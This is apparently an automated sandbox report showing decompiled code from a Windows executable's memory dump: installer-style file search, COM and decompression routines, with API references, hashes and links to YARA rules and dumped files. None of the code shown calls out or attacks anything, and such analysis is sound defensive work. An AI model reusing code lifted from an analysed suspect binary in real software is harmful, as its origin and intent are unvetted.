					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

0x00402174
0x0040217e
0x00402188
0x00402195
0x004021a0
0x004021a3
0x004021bd
0x004021c3
0x004021c9
0x004021cc
0x004021d6
0x004021da
0x004021da
0x004021df
0x004021f0
0x004021f8
0x004022d4
0x004022d4
0x004022db
0x004021fe
0x004021fe
0x0040220d
0x00402211
0x00402214
0x0040221a
0x00402228
0x0040222b
0x0040222d
0x00402238
0x00402238
0x0040223d
0x0040223f
0x00402246
0x00402246
0x00402249
0x00402252
0x00402255
0x0040225a
0x0040225c
0x00402269
0x00402269
0x0040226c
0x00402278
0x0040227b
0x00402284
0x0040228a
0x00402291
0x004022aa
0x004022ac
0x004022ba
0x004022ba
0x004022aa
0x004022bd
0x004022c3
0x004022c3
0x004022c6
0x004022cc
0x004022d2
0x004022e7
0x00000000
0x00000000
0x00000000
0x004022d2
0x004022dd
0x00402a5d
0x00402a69

APIs

CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402230

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-501415292
Opcode ID: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
Instruction ID: b205fa0f6c371e5dc37930ac793058e6edb3c03a2887874d4a759486fbbeee3c
Opcode Fuzzy Hash: 0717a7709797340a5743797a86df642296be39c6595760980035c57ed759ee55
Instruction Fuzzy Hash: F5511671A00208AFCB50DFE4CA88E9D7BB6EF48314F2041BAF515EB2D1DA799981CB14

Uniqueness

Uniqueness Score: -1.00%

Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E004061AB(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E0040624D();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004027b9
0x004027cd
0x004027d8
0x004027d9
0x00402918
0x004027bb
0x004027bb
0x004027bd
0x004027bf
0x004027bf
0x00402a5d
0x00402a69

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
Instruction ID: 52cf83cb61f6f27ed997ed7cc61b6938fc353794e3a771b70e6184720e28d6c0
Opcode Fuzzy Hash: 54e83448eb3b122805b370520c8f42e6cd15468a3f63d6e007e8d611046ccabe
Instruction Fuzzy Hash: B3F0A771604110DFD710EB649A49AEE77689F51314F6005BFF102F21C1D6B849469B3A

Uniqueness

Uniqueness Score: -1.00%

Function 00406A9B, Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406A9B(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E0040720A( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00407272( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004071CA))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3d0;
												if( *0x42e3d0 != 0) {
													L22:
													_t412 =  *0x40a444; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a448; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d24c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d248; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d250;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6d0;
													if(_t416 < 0x42d6d0) {
														L15:
														__eflags = _t416 - 0x42d48c;
														_t438 = 8;
														if(_t416 > 0x42d48c) {
															__eflags = _t416 - 0x42d650;
															if(_t416 >= 0x42d650) {
																__eflags = _t416 - 0x42d6b0;
																if(_t416 < 0x42d6b0) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00407272(0x42d250, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d24c, 0x40a444, 0x42db50, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d250, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d250 + _t440;
														E00407272(0x42d250, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d248, 0x40a448, 0x42db50, _t448 - 8);
														 *0x42e3d0 =  *0x42e3d0 + 1;
														__eflags =  *0x42e3d0;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405DA1( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
